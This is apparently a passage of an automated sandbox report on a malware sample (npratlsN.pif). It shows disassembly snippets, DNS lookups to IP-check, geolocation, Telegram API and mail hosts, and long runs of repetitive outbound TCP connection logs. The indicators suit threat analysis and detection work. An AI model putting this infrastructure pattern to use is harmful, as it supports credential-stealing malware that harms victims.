          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382160C0h14_2_38215DC8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821F9C0h14_2_3821F6C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821079Eh14_2_382104D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38218BC8h14_2_382188D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382119A6h14_2_382116D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821B6D0h14_2_3821B3D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38251190h14_2_38250E98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38250338h14_2_38250040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38250800h14_2_38250508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38250CC8h14_2_382509D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_38270038
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_38270040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_38270356
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then push 00000000h14_2_3827479F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]14_2_38937AC7
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]14_2_38934C9C
          Source: global trafficDNS query: name: amazonenviro.com
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: reallyfreegeoip.org
          Source: global trafficDNS query: name: api.telegram.org
          Source: global trafficDNS query: name: mail.irco.com.sa
          Source: global trafficDNS query: name: reallyfreegeoip.org
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49753 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49753 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49753 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49758 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49761 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49763 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49765 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49767 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49769 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49767 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49772 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49767 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49779 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49781 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49785 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49786 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49786 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49790 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49786 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49793 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49794 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49797 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49800 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49801 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49803 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49807 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49810 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49812 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49815 -> 158.101.44.242:80
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49757 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49759 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49762 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49764 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49768 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49771 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49775 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49776 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49778 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49783 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49788 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49789 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49792 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49791 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49795 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49798 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49799 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49802 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49804 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
